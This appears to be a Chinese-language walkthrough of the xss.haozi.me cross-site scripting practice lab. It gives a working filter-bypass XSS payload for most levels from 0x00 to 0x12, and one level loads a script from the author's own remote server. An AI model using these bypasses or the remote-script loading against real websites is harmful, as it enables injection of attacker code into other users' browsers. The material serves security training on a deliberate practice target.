xss.haozi靶机
X00
<script>alert(1)</script>
![](https://upload-images.jianshu.io/upload_images/4664072-68f2f33f0f0843de.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X01
</textarea><script>alert(1)</script><textarea>
![](https://upload-images.jianshu.io/upload_images/4664072-aa85e52e7372a06e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X02
"><script>alert(1)</script><"
![](https://upload-images.jianshu.io/upload_images/4664072-72eaeb4c29e733e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X03
![](https://upload-images.jianshu.io/upload_images/4664072-baa8c8f9da2cf439.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将()替换成空字符
<script>alert`1`</script>
使用反引号
![](https://upload-images.jianshu.io/upload_images/4664072-18e2fc19970eadb9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X04
![](https://upload-images.jianshu.io/upload_images/4664072-c1a1e6f14a260793.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
()和反引号都过滤
<svg><script>alert(1)</script> 进行html编码 <svg><script>alert(1)</script>
![](https://upload-images.jianshu.io/upload_images/4664072-60283e10d34b4c77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X05
![](https://upload-images.jianshu.io/upload_images/4664072-448c1f7cbb489882.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
-->替换成了笑脸
--!><script>alert(1)</script><--
![](https://upload-images.jianshu.io/upload_images/4664072-032d180526af32f0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X06
![](https://upload-images.jianshu.io/upload_images/4664072-e1745a10102cc961.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
匹配auto和on开头加=的数据,>符号,替换为_
在等号前换行
onmousedown
=alert(1)
![](https://upload-images.jianshu.io/upload_images/4664072-a7e18a5f5e484851.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X07
![](https://upload-images.jianshu.io/upload_images/4664072-2e418f73044156de.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
过滤以<开头 以>结尾的字符串
<img src=1 onerror="alert(1)"
![](https://upload-images.jianshu.io/upload_images/4664072-5a03934ea115110e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X08
</style ><script>alert(1)</script><style>
![](https://upload-images.jianshu.io/upload_images/4664072-09b386a23b31c25a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X09
https://www.segmentfault.com
![](https://upload-images.jianshu.io/upload_images/4664072-811498b112947a92.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
https://www.segmentfault.com"></script><script>alert(1)//
![](https://upload-images.jianshu.io/upload_images/4664072-aeb2b099152d3658.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X0A
https://www.segmentfault.com@xss.haozi.me/j.js
https://www.segmentfault.com@vps地址/xss.js
![](https://upload-images.jianshu.io/upload_images/4664072-76263aff520d22f2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X0B
![](https://upload-images.jianshu.io/upload_images/4664072-6c2ca503f3e101ce.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将输⼊的字符串转换成⼤写
<svg onload=alert(1)>
html编码
<svg onload=alert(1)>
![](https://upload-images.jianshu.io/upload_images/4664072-ae50e25fadec58c3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X0c
<svg onload=alert(1)>
![](https://upload-images.jianshu.io/upload_images/4664072-508e7898fec29626.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X0d
![](https://upload-images.jianshu.io/upload_images/4664072-ecddb3885308fd77.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
//只能注释单行,利⽤换⾏逃逸注释,利⽤html的"-->"注释掉后⾯字符
换行
alert(1)
-->
![](https://upload-images.jianshu.io/upload_images/4664072-db34605a508155d4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X0e
![](https://upload-images.jianshu.io/upload_images/4664072-0926e36989e69f89.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
未解决出来
X0f
![](https://upload-images.jianshu.io/upload_images/4664072-7829b2b4b73683fe.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-19d082b1985b5111.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
');alert(1)//
![](https://upload-images.jianshu.io/upload_images/4664072-aa57f82a7f7db34e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X10
alert(1)
![](https://upload-images.jianshu.io/upload_images/4664072-3a9ade899db40045.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
X11
![](https://upload-images.jianshu.io/upload_images/4664072-8a8db6587187bd24.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
");alert(1)//
![](https://upload-images.jianshu.io/upload_images/4664072-62c2f876c9d67721.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
x12
![](https://upload-images.jianshu.io/upload_images/4664072-23a5b746955c6b9f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
将双引号进行了转义
\");alert(1)//
![](https://upload-images.jianshu.io/upload_images/4664072-c4b02d2d062cb9cb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)